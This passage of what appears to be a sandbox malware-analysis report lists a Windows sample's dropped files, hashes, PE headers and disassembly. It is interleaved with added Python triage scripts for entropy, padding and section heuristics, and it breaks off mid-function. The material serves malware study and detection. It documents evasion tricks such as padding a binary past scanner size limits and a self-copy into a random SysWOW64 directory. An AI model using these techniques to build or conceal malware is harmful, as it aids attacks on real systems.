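    {"path": r"C:\Users\user\AppData\Roaming\wratetu", "process": r"C:\Windows\explorer.exe",
     "file_type": "data", "size": 248375, "entropy": 7.99937643116622, "encrypted": True,
     "sha256": "b4f15fce9a5739bc29c5f2a9a22adc707ea244763d4d4e79199202c8180a33cc"},
    {"path": r"C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp",
     "process": r"C:\Windows\System32\svchost.exe", "file_type": "ASCII text, with no line terminators",
     "size": 55, "entropy": 4.306461250274409, "encrypted": False,
     "sha256": "2b4b2d4a06044ad0bd2ae3287cfcbecd90b959feb2f503ac258d7c0a235d6fe9"},
    {"path": r"C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe (copy)", "process": r"C:\Windows\SysWOW64\cmd.exe",
     "file_type": "PE32 executable (GUI) Intel 80386, for MS Windows", "size": 14973440,
     "entropy": 4.645907802057032, "encrypted": False,
     "sha256": "b9029679671d745fee6e41a455e8daac8d64fc9da159416596d02736a544d4ab"},
]

# Assumed tuning knobs.
INJECTABLE_HOSTS = {"explorer.exe", "svchost.exe"}   # processes that never write PEs unless injected into
SYSTEM_DIRS = ("\\windows\\system32\\", "\\windows\\syswow64\\")
ENCRYPTED_ENTROPY = 7.9
PADDED_MIN_SIZE = 8 * 1024 * 1024
PADDED_MAX_ENTROPY = 5.5


def clean_path(path):
    """The report appends ' (copy)' when a file was copied rather than written; drop that marker."""
    return path[:-7] if path.endswith(" (copy)") else path


def is_pe(rec):
    return rec["file_type"].startswith("PE32")          # covers PE32 and PE32+


def triage_record(rec):
    """Return a list of (tag, explanation) findings for one dropped-file record."""
    findings = []
    lower = clean_path(rec["path"]).lower()
    writer = rec["process"].rsplit("\\", 1)[-1].lower()
    if rec["sha256"].lower() == SAMPLE_SHA256:
        findings.append(("self-copy", "byte-identical to the submitted sample: persistence copy under a random name"))
    if is_pe(rec) and writer in INJECTABLE_HOSTS:
        findings.append(("pe-from-injected-host",
                         f"{writer} wrote an executable; it does not do that on its own, which fits code injection"))
    if rec["file_type"] == "data" and (rec["encrypted"] or rec["entropy"] >= ENCRYPTED_ENTROPY):
        findings.append(("encrypted-blob",
                         f"unrecognised format at entropy {rec['entropy']:.3f}: encrypted/compressed payload or config"))
    if is_pe(rec):
        for d in SYSTEM_DIRS:
            if d in lower and "\\" in lower.split(d, 1)[1]:
                findings.append(("system-dir-subdir", "executable planted in a new subdirectory of the system directory"))
                break
        if rec["size"] >= PADDED_MIN_SIZE and rec["entropy"] < PADDED_MAX_ENTROPY:
            findings.append(("padded-pe",
                             f"{rec['size'] / 2**20:.1f} MiB at entropy {rec['entropy']:.2f}: "
                             "likely padded with repetitive data to exceed scanner size limits"))
    return findings


def triage(records):
    """Map each cleaned path to its findings; paths with an empty list are uninteresting."""
    return {clean_path(r["path"]): triage_record(r) for r in records}


def tags_for(findings, path):
    return {tag for tag, _ in findings.get(path, [])}


if __name__ == "__main__":
    for path, hits in triage(DROPPED_FILES).items():
        print(path or "<none>")
        for tag, why in hits:
            print(f"  [{tag}] {why}")
```

The svchost.exe font-cache record comes out empty, which is the point of keying the injected-host rule on PE type rather than on the writer alone: system services write plenty of small data files during a run.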
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Process: C:\Windows\System32\svchost.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 55
Entropy (8bit): 4.306461250274409
Encrypted: false
SSDEEP: 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5: DCA83F08D448911A14C22EBCACC5AD57
SHA1: 91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256: 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512: 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9DFBACA
Malicious: false
Reputation: unknown
Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
Note: font-cache metadata written by the Windows Font Cache service host; background activity of the analysis VM, not of the sample.

C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
Process: C:\Program Files\Windows Defender\MpCmdRun.exe
File Type: Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category: modified
Size (bytes): 7250
Entropy (8bit): 3.1662738963358006
Encrypted: false
SSDEEP: 96:cEj+AbCEH+AbuEAc+AbhGEA+AbNEe+Ab/Ee+AbPE6w9+Ab1wTEE+Abd:cY+38+DJc+iGr+MZ+65+6tg+ECf+U
MD5: D84538A0E9147E5B95BC1467B1B2896E
SHA1: 1FEDFAF48A265C0DE88815A8EA821B48F70CA1BA
SHA-256: 385EBB80F9EEBAD4B6B05FD2518ABBFC508981C992566B8844A9937BFD2EE9B0
SHA-512: 325545DCE9302944A12C8715BCFD5E23085E522D91133471EB4C818998725EC65ECF44EC033F3B237EBA0A1AF64048F5011DC4A97B3F014CDB246C9FDA859402
Malicious: false
Reputation: unknown
Preview: ..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
Preview decoded from UTF-16LE (line breaks collapsed): MpCmdRun: Command Line: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable / Start Time: Thu Jun 27 2019 01:29:49 / MpEnsureProcessMitigationPolicy: hr = 0x1 / WDEnable / ERROR: MpWDEnable(TRUE) failed (800704EC) / MpCmdRun: End Time: Thu Jun 27 2019 01:29:49
Note: 0x800704EC is the HRESULT form of ERROR_ACCESS_DISABLED_BY_POLICY, so the previewed entry records an attempt to re-enable Defender being blocked by policy on 2019-06-27, long before this run (the Delivery Optimization log below is dated 2022-01-05); it describes the state of the analysis image, not behaviour of the sample. Only the start of the log is previewed, so whatever was appended to it during this run (hence Category: modified) is not visible here.

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20220105_033224_675.etl
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 8192
Entropy (8bit): 3.312992075887116
Encrypted: false
SSDEEP: 96:PCFdQ2o+HK5Lu9D2YPmCKTvI2l5SkGP4nlT2FbYFzGUMCl6JRW:Kf5Cml2CJxnC+w
MD5: 699F867B2888AADC69EA64322AFA75D9
SHA1: 1B6A8DFECF131411C6F6E4A2951A1C9ED8AA324B
SHA-256: 2DB7A93AD5A6FDD71E29DC63581BA513221F106F577A530AA84C4599795579A8
SHA-512: AB460B75F2E7ED82E48301554696B523BEB69E7193686FF30911C62A38031F2736BAAE8AF021E80EF687CB4B4F09BF0C18426EE1BB843C0BA9ADE575DF400C18
Malicious: false
Reputation: unknown
Preview: .... ... ....................................... ...!...........................l...@...M........................B..............Zb... ... ..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................./_8..... ......h..............8.6.9.6.E.A.C.4.-.1.2.8.8.-.4.2.8.8.-.A.4.E.E.-.4.9.E.E.4.3.1.B.0.A.D.9...C.:.\.W.i.n.d.o.w.s.\.S.e.r.v.i.c.e.P.r.o.f.i.l.e.s.\.N.e.t.w.o.r.k.S.e.r.v.i.c.e.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.D.e.l.i.v.e.r.y.O.p.t.i.m.i.z.a.t.i.o.n.\.L.o.g.s.\.d.o.s.v.c...2.0.2.2.0.1.0.5._.0.3.3.2.2.4._.6.7.5...e.t.l.........P.P.l...@...M.......................................................................................................................................................................................................................................................................
Note: Delivery Optimization service ETW trace log created by its svchost.exe host; routine OS activity unrelated to the sample.

C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe (copy)
Process: C:\Windows\SysWOW64\cmd.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 14973440
Entropy (8bit): 4.645907802057032
Encrypted: false
SSDEEP: 6144:+AH3plu5xWDwtTwKc6+9YwoTPxSeI2co8mfgWddddddddddddddddddddddddddt:+AH3pCxvTS6Wh6PIeI/
MD5: F548B3529CA470C25E50AF6220AD3098
SHA1: A241FBA1FD229664849616D3425AC80DA447583B
SHA-256: B9029679671D745FEE6E41A455E8DAAC8D64FC9DA159416596D02736A544D4AB
SHA-512: 1E6C0914678E07D1DBCA262F57D88ED54E35E6B15AC4E5ADFE74EBB001D323BB45CEA47F1CCB9995BC65B02C00CEAE5ACE2AE3AF590829050963514351AA5CA7
Malicious: true
Reputation: unknown
Note: copied by cmd.exe (the "(copy)" suffix is the report's marker for a file copy rather than a fresh write) into a newly created random-named directory under SysWOW64. At 14.3 MiB with an entropy of 4.65, far below the 6.3 to 6.6 of the other executables in this list, the binary is heavily padded; the long run of repeated characters in the SSDEEP hash reflects that repetitive content.
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................................C..........R..........................Rich............PE..L...15.`.................>...........+.......P....@.................................*(......................................<;..(.......`....................P..,#..`............................... ...@............................................text...n<.......>.................. ..`.data...H%...P.......B..............@....lave................X..............@....fidoce.K............Z..............@....pihudu..............\..............@....lafog...............^..............@....rsrc...`............l..............@..@.reloc...>...P......................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                        \Device\ConDrv
                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3773
                                                                                                                                                                                                        Entropy (8bit):4.7109073551842435
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:VHILZNfrI7WFY32iIiNOmV/HToZV9It199hiALlIg39bWA1RvTBi/g2eB:VoLr0y9iIiNOoHTou7bhBlIydWALLt2w
                                                                                                                                                                                                        MD5:DA3247A302D70819F10BCEEBAF400503
                                                                                                                                                                                                        SHA1:2857AA198EE76C86FC929CC3388A56D5FD051844
                                                                                                                                                                                                        SHA-256:5262E1EE394F329CD1F87EA31BA4A396C4A76EDC3A87612A179F81F21606ABC8
                                                                                                                                                                                                        SHA-512:48FFEC059B4E88F21C2AA4049B7D9E303C0C93D1AD771E405827149EDDF986A72EF49C0F6D8B70F5839DCDBD6B1EA8125C8B300134B7F71C47702B577AD090F8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: ..A specified value is not valid.....Usage: add rule name=<string>.. dir=in|out.. action=allow|block|bypass.. [program=<program path>].. [service=<service short name>|any].. [description=<string>].. [enable=yes|no (default=yes)].. [profile=public|private|domain|any[,...]].. [localip=any|<IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [remoteip=any|localsubnet|dns|dhcp|wins|defaultgateway|.. <IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [localport=0-65535|<port range>[,...]|RPC|RPC-EPMap|IPHTTPS|any (default=any)].. [remoteport=0-65535|<port range>[,...]|any (default=any)].. [protocol=0-255|icmpv4|icmpv6|icmpv4:type,code|icmpv6:type,code|.. tcp|udp|any (default=any)].. [interfacetype=wireless|lan|ras|any].. [rmtcomputergrp=<SDDL string>].. [rmtusrgrp=<SDDL string>].. [edge=yes|deferapp|deferuser|no (default=no)].. [security=authenticate|authenc|authdynenc|authnoencap|
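Every dropped-file record above carries the same fingerprint fields: size, 8-bit entropy, MD5/SHA-1/SHA-256/SHA-512 and an SSDEEP. The following Python is an added example, not part of the Joe Sandbox report: it computes those fields (SSDEEP excepted, which needs the external ssdeep library) and scans a buffer for long low-entropy stretches. The 14,973,440-byte sdiimdop.exe record above is the kind of artifact such a scan is meant to flag: its entropy of 4.65 is well below the 6.63 of the 343,040-byte original sample, and its SSDEEP contains a long repeat of one chunk, both consistent with a small payload inflated with filler to push the file past size limits. The sample buffer is constructed inline; the window size and threshold are assumptions, not values from the report.

```python
import hashlib
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for a constant buffer, 8.0 for a
    uniform one. This is the quantity the report lists as 'Entropy (8bit)'."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def fingerprint(data: bytes) -> dict:
    """Size, hashes and entropy in the fields a dropped-file record carries
    (SSDEEP omitted: it requires the external ssdeep library)."""
    return {
        "size": len(data),
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
        "sha512": hashlib.sha512(data).hexdigest(),
        "entropy": shannon_entropy(data),
    }


def low_entropy_regions(data: bytes, window: int = 4096, threshold: float = 1.0) -> list:
    """Slide a fixed window over the buffer and merge consecutive windows whose entropy
    falls below `threshold` into (start, end) byte ranges. Long runs of near-constant
    bytes are the usual footprint of size inflation. Window and threshold are assumptions."""
    regions = []
    start = None
    for off in range(0, len(data), window):
        if shannon_entropy(data[off:off + window]) < threshold:
            if start is None:
                start = off
        elif start is not None:
            regions.append((start, off))
            start = None
    if start is not None:
        regions.append((start, len(data)))
    return regions


def padding_ratio(data: bytes, window: int = 4096, threshold: float = 1.0) -> float:
    """Fraction of the buffer covered by low-entropy regions."""
    if not data:
        return 0.0
    covered = sum(end - start for start, end in low_entropy_regions(data, window, threshold))
    return covered / len(data)


# Constructed sample (not data from the report): 4 KiB of high-entropy bytes, 64 KiB of a
# single repeated byte, then 1 KiB of high-entropy bytes, standing in for an inflated drop.
SAMPLE = bytes(range(256)) * 16 + b"\x64" * 65536 + bytes(range(256)) * 4


if __name__ == "__main__":
    info = fingerprint(SAMPLE)
    print(f"size={info['size']} entropy={info['entropy']:.3f} sha256={info['sha256']}")
    for start, end in low_entropy_regions(SAMPLE):
        print(f"low-entropy region: 0x{start:x}-0x{end:x} ({end - start} bytes)")
    print(f"padding ratio: {padding_ratio(SAMPLE):.2%}")
```

Whole-file entropy alone can hide the pattern when the filler is not a single byte value; the windowed scan reports where the low-entropy bytes sit, which is what you want before carving the real payload out of the inflated file for further analysis.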

                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                        General

                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Entropy (8bit):6.634640145792183
                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.83%
                                                                                                                                                                                                        • Windows Screen Saver (13104/52) 0.13%
                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                        File name:nkINykHreE.exe
                                                                                                                                                                                                        File size:343040
                                                                                                                                                                                                        MD5:dc67c627917ff9724f3c1e6db5f2dc27
                                                                                                                                                                                                        SHA1:4b7528999ad6095b3fbb3aec059efb88d999ea95
                                                                                                                                                                                                        SHA256:26a4c5b36d9fde80ea47137eb53b40dacf240432a5895f98417eae51b6b681da
                                                                                                                                                                                                        SHA512:977aab0ac60948315435e0698058598f40f42d7830b87ee7668bb209938cb388aa5b07c13b66c56db1affa6f86a859b3c01666a22e437c808b6c9db38975c7b0
                                                                                                                                                                                                        SSDEEP:6144:5lA3X2bDueST6gKO1tqT7b4YlCTFGbGQ273pQGfT:5lA3X22e0VKYY70A4FOGQKt
                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................................C..........R...........................Rich............PE..L....(._.................@.........

                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                        Icon Hash:c8d0d8e0f8e8f4e8

                                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Entrypoint:0x422e10
                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                                        Time Stamp:0x5F83280E [Sun Oct 11 15:43:10 2020 UTC]
                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                        OS Version Major:5
                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                        File Version Major:5
                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                        Subsystem Version Major:5
                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                        Import Hash:e64508a754c560e6e71788b6f0d7d44d

                                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                        mov edi, edi
                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                                        call 00007F6780FB087Bh
                                                                                                                                                                                                        call 00007F6780FA0EA6h
                                                                                                                                                                                                        pop ebp
                                                                                                                                                                                                        ret
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        mov edi, edi
                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                                        push FFFFFFFEh
                                                                                                                                                                                                        push 004435E0h
                                                                                                                                                                                                        push 0042C640h
                                                                                                                                                                                                        mov eax, dword ptr fs:[00000000h]
                                                                                                                                                                                                        push eax
                                                                                                                                                                                                        add esp, FFFFFF94h
                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                        push esi
                                                                                                                                                                                                        push edi
                                                                                                                                                                                                        mov eax, dword ptr [00445748h]
                                                                                                                                                                                                        xor dword ptr [ebp-08h], eax
                                                                                                                                                                                                        xor eax, ebp
                                                                                                                                                                                                        push eax
                                                                                                                                                                                                        lea eax, dword ptr [ebp-10h]
                                                                                                                                                                                                        mov dword ptr fs:[00000000h], eax
                                                                                                                                                                                                        mov dword ptr [ebp-18h], esp
                                                                                                                                                                                                        mov dword ptr [ebp-70h], 00000000h
                                                                                                                                                                                                        mov dword ptr [ebp-04h], 00000000h
                                                                                                                                                                                                        lea eax, dword ptr [ebp-60h]
                                                                                                                                                                                                        push eax
                                                                                                                                                                                                        call dword ptr [00401218h]
                                                                                                                                                                                                        mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                                                                        jmp 00007F6780FA0EB8h
                                                                                                                                                                                                        mov eax, 00000001h
                                                                                                                                                                                                        ret
                                                                                                                                                                                                        mov esp, dword ptr [ebp-18h]
                                                                                                                                                                                                        mov dword ptr [ebp-78h], 000000FFh
                                                                                                                                                                                                        mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                                                                        mov eax, dword ptr [ebp-78h]
                                                                                                                                                                                                        jmp 00007F6780FA0FE7h
                                                                                                                                                                                                        mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                                                                        call 00007F6780FA1024h
                                                                                                                                                                                                        mov dword ptr [ebp-6Ch], eax
                                                                                                                                                                                                        push 00000001h
                                                                                                                                                                                                        call 00007F6780FB125Ah
                                                                                                                                                                                                        add esp, 04h
                                                                                                                                                                                                        test eax, eax
                                                                                                                                                                                                        jne 00007F6780FA0E9Ch
                                                                                                                                                                                                        push 0000001Ch
                                                                                                                                                                                                        call 00007F6780FA0FDCh
                                                                                                                                                                                                        add esp, 04h
                                                                                                                                                                                                        call 00007F6780FAC4D4h
                                                                                                                                                                                                        test eax, eax
                                                                                                                                                                                                        jne 00007F6780FA0E9Ch
                                                                                                                                                                                                        push 00000010h

Rich Headers

Programming Language:
• [ C ] VS2008 build 21022
• [IMP] VS2005 build 50727
• [ASM] VS2008 build 21022
• [LNK] VS2008 build 21022
• [RES] VS2008 build 21022
• [C++] VS2008 build 21022

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x43d6c | 0x28 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x5c000 | 0x8d60 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x65000 | 0x2338 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1360 | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa720 | 0x40 | .text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x2e8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x43e9e | 0x44000 | False | 0.564783432904 | data | 6.85301887621 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data | 0x45000 | 0x12548 | 0x1600 | False | 0.234907670455 | data | 3.04465131618 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.bekuvox | 0x58000 | 0x5 | 0x200 | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.jutu | 0x59000 | 0x4b | 0x200 | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.vezev | 0x5a000 | 0xea | 0x200 | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.mubone | 0x5b000 | 0xd93 | 0xe00 | False | 0.00697544642857 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x5c000 | 0x8d60 | 0x8e00 | False | 0.550533670775 | data | 5.61683000137 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x65000 | 0x3e84 | 0x4000 | False | 0.444885253906 | data | 4.56707219047 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
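The Sections table is the static side of the unpacking behaviour flagged in the signature list: a .text section at 6.85 bits per byte next to four sections with made-up names (.bekuvox, .jutu, .vezev, .mubone) whose contents have zero entropy. The script below is an added example and is not part of the Joe Sandbox report or of the analysed sample; it reproduces that check offline with the standard library only. It parses the COFF section table, computes per-section Shannon entropy and applies four heuristics. The STANDARD_SECTIONS set, the 6.5 entropy cut-off and the 2x virtual-to-raw-size ratio are assumptions chosen for this example, and the PE it runs on is constructed in memory rather than read from nkINykHreE.exe.

```python
"""PE section triage with the standard library only: parse the section table,
compute per-section entropy and flag the packer tells a sandbox's Sections
table exposes. Example code, not the report's or the sample's own."""
import math
import struct

# Section characteristic bits (winnt.h).
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# Assumption: names a stock MSVC link emits; anything else deserves a look.
STANDARD_SECTIONS = {".text", ".data", ".rdata", ".bss", ".idata", ".edata",
                     ".rsrc", ".reloc", ".pdata", ".tls", ".CRT", ".textbss"}
HIGH_ENTROPY = 6.5   # assumed cut-off: plain x86 code usually sits below this
VSIZE_RATIO = 2.0    # assumed: virtual size this much larger than raw is suspicious
SECTION_HDR = "<8sIIIIIIHHI"  # IMAGE_SECTION_HEADER, 40 bytes


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for a uniform one."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes) -> list:
    """Walk e_lfanew -> COFF header -> section table; one dict per section."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_hdr_size = struct.unpack_from("<H", pe, coff + 16)[0]
    off = coff + 20 + opt_hdr_size
    sections = []
    for _ in range(num_sections):
        name, vsize, va, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from(SECTION_HDR, pe, off)
        raw = pe[raw_ptr:raw_ptr + raw_size]  # empty if the header points outside the file
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_address": va, "virtual_size": vsize, "raw_size": raw_size,
            "characteristics": chars, "entropy": shannon_entropy(raw),
        })
        off += struct.calcsize(SECTION_HDR)
    return sections


def triage_section(sec: dict) -> list:
    """Heuristic findings for one parsed section (empty list means nothing notable)."""
    ch, flags = sec["characteristics"], []
    if sec["name"] not in STANDARD_SECTIONS:
        flags.append("non-standard section name")
    if ch & IMAGE_SCN_MEM_EXECUTE and ch & IMAGE_SCN_MEM_WRITE:
        flags.append("writable and executable")
    if ch & (IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_CNT_CODE) and sec["entropy"] > HIGH_ENTROPY:
        flags.append("high-entropy code (packed or encrypted)")
    if sec["raw_size"] and sec["virtual_size"] > VSIZE_RATIO * sec["raw_size"]:
        flags.append("virtual size far exceeds raw size")
    return flags


def triage(pe: bytes) -> dict:
    """Section name -> findings for every section in the image."""
    return {s["name"]: triage_section(s) for s in parse_sections(pe)}


def build_test_pe(sections) -> bytes:
    """Constructed, non-runnable PE32 image with a zeroed optional header and the
    given (name, raw_bytes, virtual_size, characteristics) sections."""
    e_lfanew, opt_hdr_size, file_align = 0x40, 0xE0, 0x200

    def align(x):
        return (x + file_align - 1) // file_align * file_align

    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_hdr_size, 0x102)
    headers_len = e_lfanew + 4 + len(coff) + opt_hdr_size + 40 * len(sections)
    raw_ptr, va, hdrs, body = align(headers_len), 0x1000, b"", b""
    for name, data, vsize, chars in sections:
        raw = data.ljust(align(len(data)), b"\0")
        hdrs += struct.pack(SECTION_HDR, name.encode(), vsize, va, len(raw), raw_ptr, 0, 0, 0, 0, chars)
        body += raw
        raw_ptr += len(raw)
        va += (max(vsize, len(raw)) + 0xFFF) & ~0xFFF
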